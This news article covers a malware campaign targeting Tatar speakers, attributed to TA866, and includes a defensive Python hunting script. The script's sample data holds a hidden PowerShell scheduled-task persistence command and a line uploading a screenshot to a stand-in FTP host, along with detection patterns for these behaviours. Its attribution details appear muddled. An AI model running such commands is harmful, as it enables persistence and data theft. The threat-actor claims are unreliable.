In recent cybersecurity news, researchers have uncovered a new strain of Python malware specifically targeted at users who speak the Tatar language. The Tatar language is primarily spoken by the Tatars, an ethnic group in Russia and neighboring countries. This particular malware, which was discovered by Cyble, has the capability to capture screenshots on infected systems and send them to a remote server using FTP (File Transfer Protocol).
The group behind this campaign has been identified as the TA866 threat actor, a notorious group known for targeting Tatar-speaking individuals and using Python malware in its operations. The attacks coincided with Tatar Republic Day and continued until the end of August. According to researchers at CRIL, TA866 used a PowerShell script to capture screenshots and upload them to a remote FTP server.
The attack begins with phishing emails carrying a malicious RAR archive. The archive holds two files that look harmless at first glance: a video file and a Python-based executable disguised as an image by means of a dual file extension. Once the disguised executable runs, the loader fetches a zip file from Dropbox that contains an additional executable and two PowerShell scripts. The scripts create a scheduled task that launches the malicious executable.
Proofpoint, another cybersecurity firm, has researched the origins of TA866 and has linked the group to a financially motivated group called “Screentime.” This group is believed to be responsible for other similar campaigns, including ones targeting organizations in the United States and Germany. Proofpoint describes it as a well-organized group capable of carrying out planned attacks at scale.
The sophistication of these attacks stems from the custom tools and services TA866 has developed. The RAR archive is the initial vector for the Python malware, but before the final payload is launched the group works through a full infection chain, including the use of Tatar-language filenames to evade detection. A malicious executable displays a message to the victim while PowerShell scripts silently capture screenshots and transmit them to an FTP server. In the next phase of the attack, TA866 deploys additional post-exploitation tools, potentially including a Cobalt Strike beacon, Remote Access Trojans (RATs), stealers, and other malicious programs.
The range of payloads and malware used by TA866 suggests that it is not a novice group but an organization of highly skilled individuals with demonstrated expertise in developing advanced malware strains and payloads.
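The infection chain described above (a dual-extension executable posing as an image inside an archive, PowerShell creating a scheduled task, and PowerShell uploading captures to an FTP server) gives defenders several concrete things to hunt for. The script below is an added example written for this article, not code from Cyble, CRIL, or Proofpoint, and not tied to the actual samples: it flags disguised dual-extension filenames in an archive listing and classifies process-creation records by the behaviours the chain exhibits. The record shape (`image`, `parent`, `cmdline`), the filenames, the 203.0.113.10 address, and the command lines are all constructed for illustration.

```python
"""
Hunting heuristics for the TA866-style chain described in the article.
Constructed example: none of the names, paths or addresses below are real
indicators from the campaign.
"""
import re
from pathlib import PurePosixPath

# Extensions a user expects to be harmless media or documents.
BENIGN_LOOKING = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".mp4", ".avi",
                  ".pdf", ".doc", ".docx", ".txt"}
# Extensions Windows will actually execute when double-clicked.
EXECUTABLE = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".ps1", ".vbs", ".js"}

# Command-line patterns for the behaviours the article describes.
SCHTASK_RE = re.compile(r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I)
FTP_RE = re.compile(r"ftp://|FtpWebRequest", re.I)
SCREEN_RE = re.compile(r"CopyFromScreen", re.I)  # .NET screen-capture API


def _basename(path: str) -> str:
    """Last path component, tolerating both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1]


def is_dual_extension_disguise(name: str) -> bool:
    """True for names like 'photo.jpg.exe': a benign-looking extension
    immediately followed by an executable one (case-insensitive)."""
    suffixes = [s.strip().lower() for s in PurePosixPath(_basename(name)).suffixes]
    if len(suffixes) < 2:
        return False
    return suffixes[-2] in BENIGN_LOOKING and suffixes[-1] in EXECUTABLE


def scan_archive_listing(entries):
    """Return archive entries that look like disguised executables."""
    return [e for e in entries if is_dual_extension_disguise(e)]


def classify_process_event(event: dict) -> list:
    """Return the detection labels matched by one process-creation record."""
    hits = []
    image = event.get("image", "")
    parent = event.get("parent", "")
    cmd = event.get("cmdline", "")
    is_ps = "powershell" in image.lower() or "powershell" in cmd.lower()

    if is_dual_extension_disguise(image):
        hits.append("dual_extension_image")
    if is_ps:
        if SCHTASK_RE.search(cmd):
            hits.append("powershell_scheduled_task")
        if FTP_RE.search(cmd):
            hits.append("powershell_ftp_upload")
        if SCREEN_RE.search(cmd):
            hits.append("powershell_screen_capture")
    # A disguised lure spawning PowerShell is the pivot point of the chain.
    if is_dual_extension_disguise(parent) and "powershell" in image.lower():
        hits.append("disguised_parent_spawns_powershell")
    return hits


def hunt(events):
    """Map event index -> labels for every event that matched something."""
    return {i: h for i, e in enumerate(events) if (h := classify_process_event(e))}


# Constructed sample data (not real campaign artefacts).
SAMPLE_ARCHIVE = ["celebration.mp4", "photo.jpg.exe"]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": r"C:\Users\u\Downloads\photo.jpg.exe",
     "parent": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r"C:\Users\u\Downloads\photo.jpg.exe"},
    {"image": PS, "parent": r"C:\Users\u\Downloads\photo.jpg.exe",
     "cmdline": r'powershell.exe -w hidden -c "schtasks /create /tn Update /tr C:\Users\u\AppData\update.exe /sc minute"'},
    {"image": PS, "parent": r"C:\Users\u\AppData\update.exe",
     "cmdline": r"powershell.exe -c \"$c=New-Object Net.WebClient;$c.UploadFile('ftp://203.0.113.10/up/shot.png','C:\Users\u\AppData\shot.png')\""},
    {"image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    print("disguised archive entries:", scan_archive_listing(SAMPLE_ARCHIVE))
    for idx, labels in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {labels}")
```

The first event is the lure itself, the second is the persistence step, the third is the exfiltration step, and the fourth is ordinary PowerShell use that should not fire. In practice the same heuristics would run over Sysmon or EDR process-creation telemetry rather than a hand-built list, and the dual-extension check is worth applying at the mail gateway as well as at the endpoint.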
It is important to note that this report is based on internal and external research conducted by various sources. The information provided is for reference purposes only, and users should exercise caution when relying on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
In conclusion, the discovery of a new Python malware strain targeting Tatar-speaking users highlights the ongoing and evolving threats in the cybersecurity landscape. TA866’s use of custom tooling and its ability to carry out sophisticated attacks underline the importance of robust cybersecurity measures to protect against such threats.
